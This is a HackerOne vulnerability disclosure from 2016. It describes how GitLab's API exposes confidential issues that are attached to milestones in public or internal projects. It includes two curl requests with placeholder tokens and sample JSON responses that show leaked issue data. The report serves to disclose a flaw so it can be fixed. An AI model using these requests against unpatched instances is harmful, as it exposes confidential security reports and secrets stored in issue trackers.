GitLab: Confidential issues leaked in public projects when attached to milestone

ID H1:134300
Type hackerone
Reporter jobert
Modified 2016-05-03T00:59:28


Vulnerability details

When a confidential issue in a public or internal project is attached to a milestone, it is exposed through the GitLab API.

Proof of concept

As a victim, create a new public or internal project. Lets state that the project has ID 1. Create a milestone for this project. After that, create a confidential issue for this project and attach it to the milestone. In this proof of concept, we're going to extract the title and description of the confidential issue. As an attacker, start by fetching all the milestones for the project:

bash curl --header "PRIVATE-TOKEN: XXXXXXXXXXXXXX" "http://gitlab-instance/api/v3/projects/1/milestones"

The command will respond with all milestones. In this example, it returns the milestone that was created by the victim:

json [ { "id":3, "iid":1, "project_id":1, "title":"Milestone title", "description":"Milestone description", "state":"active", "created_at":"2016-04-22T01:15:37.902Z", "updated_at":"2016-04-22T01:15:37.902Z", "due_date":null } ]

For each unique milestone ID that is returned in this response, execute the following command:

bash curl --header "PRIVATE-TOKEN: XXXXXXXXXXXXXX" "http://gitlab-instance/api/v3/projects/1/milestones/3/issues"

The response if this request will contain all issues, including confidential issues:

json [ { "id":13, "iid":1, "project_id":1, "title":"Some confidential issue", "description":"This is some super confidential information.", "state":"opened", "created_at":"2016-04-22T00:59:38.877Z", "updated_at":"2016-04-25T00:10:16.711Z", "labels":[], "milestone": { "id":3, "iid":1, "project_id":1, "title":"Milestone title", "description":"Milestone description", "state":"active", "created_at":"2016-04-22T01:15:37.902Z", "updated_at":"2016-04-22T01:15:37.902Z", "due_date":null }, "assignee":null, "author": { "name":"John Doe", "username":"john", "id":1, "state":"active", "avatar_url":"\u0026d=identicon", "web_url":"http://gitlab-instance/u/john" } } ]


Confidential issues may contain information that shouldn't be known to the outside. An example could be security issues that are tracked in GitLab for open source projects, like gitlab-org/gitlab-ce or gitlab-org/gitlab-ee. It may also contain private API tokens that need to be tracked in a task (I wouldn't recommend it, but it happens).